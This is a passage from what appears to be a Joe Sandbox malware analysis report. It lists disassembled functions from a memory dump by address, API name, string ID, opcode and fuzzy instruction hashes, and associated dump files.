                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                    • Instruction ID: 437541ac0b697d3eb74a4787f4ef93ef6e1e5670fa6dea0ca669f7c414c13a09
                                                                                    • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                                                    • Instruction Fuzzy Hash: 5891B471E0020A9BEB64DF6DC9886BEBBF5FF443A0F14855AE9D5E72C0D73089408769
                                                                                    Function 0104D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: Bl$l
                                                                                    • API String ID: 3446177414-208461968
                                                                                    • Opcode ID: 54968249cbc97cf6f264424728b880958a0efc6871ac3afd7592b17655fb3862
                                                                                    • Instruction ID: 1768228d1383a475bd103a79deff4911764bb2a10a0e80c109288e9015ed5be8
                                                                                    • Opcode Fuzzy Hash: 54968249cbc97cf6f264424728b880958a0efc6871ac3afd7592b17655fb3862
                                                                                    • Instruction Fuzzy Hash: 3CA1B5B1A003299BEB75DF99C8D0BEEB7F1AB64304F0440F9D98967241CB74AE84CB51
                                                                                    Function 01075DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 01075E34
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 3213639722-2276729525
                                                                                    • Opcode ID: cd07c92ba046d15598770f3d441a1e22c09a93af9f14dfb1665ad9b1f8bb6d6d
                                                                                    • Instruction ID: 742c664bdc166f706134076c5ea2c513250dee88769a9d9f5d0fd31e021b475a
                                                                                    • Opcode Fuzzy Hash: cd07c92ba046d15598770f3d441a1e22c09a93af9f14dfb1665ad9b1f8bb6d6d
                                                                                    • Instruction Fuzzy Hash: 1B515971E0820696DB66771CDD013FE3BD4EB00710F10CD98E0E686299EA3988D58B8E
                                                                                    Function 01064C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0$Flst
                                                                                    • API String ID: 0-758220159
                                                                                    • Opcode ID: a232495a8bfcacad2469999957d02f2217b72b4ec9e743f70e70ea2bab36c271
                                                                                    • Instruction ID: e1954523fca10ee7161ecb4b6f59706f1ccd1fcb667cb17d3509b7af3678c8cd
                                                                                    • Opcode Fuzzy Hash: a232495a8bfcacad2469999957d02f2217b72b4ec9e743f70e70ea2bab36c271
                                                                                    • Instruction Fuzzy Hash: 0C517AB1E002189FDF66EFA9C4846ADFBF8FF54714F5480AAD089DB251E7709985CB80
                                                                                    Function 0105D7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlDebugPrintTimes.NTDLL ref: 0105D959
                                                                                      • Part of subcall function 01034859: RtlDebugPrintTimes.NTDLL ref: 010348F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $$$
                                                                                    • API String ID: 3446177414-233714265
                                                                                    • Opcode ID: 16493aaa3c6615e3d3fa829d3f086cce610cfcd3a2350f0a0f73a936071f68ab
                                                                                    • Instruction ID: f551544c47d8a35f94558d0805d7afbec9e1ce78183daac1cee3b605b7d687b6
                                                                                    • Opcode Fuzzy Hash: 16493aaa3c6615e3d3fa829d3f086cce610cfcd3a2350f0a0f73a936071f68ab
                                                                                    • Instruction Fuzzy Hash: D151F771A0034ADFDBA4DFE8C4847EEBBF2BF44314F1441AAD8956B285D7749891CB80
                                                                                    Function 010AFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: $
                                                                                    • API String ID: 3446177414-3993045852
                                                                                    • Opcode ID: 79b3330e71c218f4e5dcc193da8015e8a6963b6a806d27edeaef947813946e2e
                                                                                    • Instruction ID: c202b29b94f837df0509da63c1fbaeb627f3848508d8480756d64e05f0b94dcb
                                                                                    • Opcode Fuzzy Hash: 79b3330e71c218f4e5dcc193da8015e8a6963b6a806d27edeaef947813946e2e
                                                                                    • Instruction Fuzzy Hash: D141BF75A0020AABDF22DF99C880AEEBBF5FF48704F540169EE94A7302C7719D51CB90
                                                                                    Function 0102DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000017.00000002.1505144179.0000000001026000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001000000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001007000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001080000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001086000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.00000000010C2000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001123000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000017.00000002.1505144179.0000000001129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_23_2_1000000_RAangyFeHdZLco.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: 0$0
                                                                                    • API String ID: 3446177414-203156872
                                                                                    • Opcode ID: e918883121a679bcf0c318746239e3ee21029b0842da92d216f5af68373c3c82
                                                                                    • Instruction ID: 065773f46ad96c24c0bfa0ba32277eb6315e317693e83b598bc5ab9b4a69cc5b
                                                                                    • Opcode Fuzzy Hash: e918883121a679bcf0c318746239e3ee21029b0842da92d216f5af68373c3c82
                                                                                    • Instruction Fuzzy Hash: C6418BB16087569FC350CF28C484A5ABBE4BB88314F044A6EF9C8DB341D731EA45CB96